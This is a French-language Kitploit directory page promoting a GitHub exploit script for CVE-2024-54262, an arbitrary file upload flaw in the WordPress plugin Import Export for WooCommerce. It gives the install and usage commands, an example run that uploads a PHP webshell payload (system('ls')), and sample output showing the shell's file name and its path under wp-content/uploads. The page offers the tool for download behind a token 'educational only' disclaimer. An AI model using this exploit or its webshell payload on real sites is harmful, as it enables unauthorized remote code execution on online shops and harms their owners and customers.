Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-54262 — Exploiter CVE-2024-54262 : Téléchargement de fichier arbitraire dans Import Export pour WooCommerce | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-54262
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubnxploited/cve-2024-54262

CVE-2024-54262

Exploiter CVE-2024-54262 : Téléchargement de fichier arbitraire dans Import Export pour WooCommerce

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-54262

Exploitation de CVE-2024-54262 : Téléchargement arbitraire de fichiers dans Import Export for WooCommerce

Aperçu

Ce script exploite une vulnérabilité dans le plugin WordPress « Import Export for WooCommerce ». La vulnérabilité permet à des utilisateurs non autorisés de télécharger des fichiers arbitraires, ce qui peut entraîner une exécution de code à distance (RCE).

Fonctionnalités :

  • Détection de version : Vérifie automatiquement si le site WordPress exécute une version vulnérable du plugin.
  • Authentification : Prend en charge la connexion WordPress pour une exploitation ultérieure.
  • Téléchargement de fichiers : Permet de télécharger des fichiers PHP malveillants pour une RCE.

Prérequis :

  1. Python 3.x
  2. Bibliothèques Python requises :
    • requests
    • argparse

Installez les dépendances avec :

root@kitploit:~
pip install requests
  1. Assurez-vous que le site WordPress cible utilise la version vulnérable du plugin.

Utilisation :

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

Exemple :

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

Explication de la sortie

  1. Le site est vulnérable.
    • Indique que le site WordPress exécute une version vulnérable du plugin.
  2. Connexion réussie.
    • Confirme la connexion réussie avec les identifiants fournis.
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • Nom du shell : import_manual_1737090262.php
  • Chemin du shell : wp-content/uploads/import-export-for-woocommerce/product/

Avertissement

Cet outil est uniquement à des fins éducatives. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script. L'accès non autorisé ou l'exploitation de systèmes sans autorisation explicite est illégal et contraire à l'éthique.

Télécharger l’outil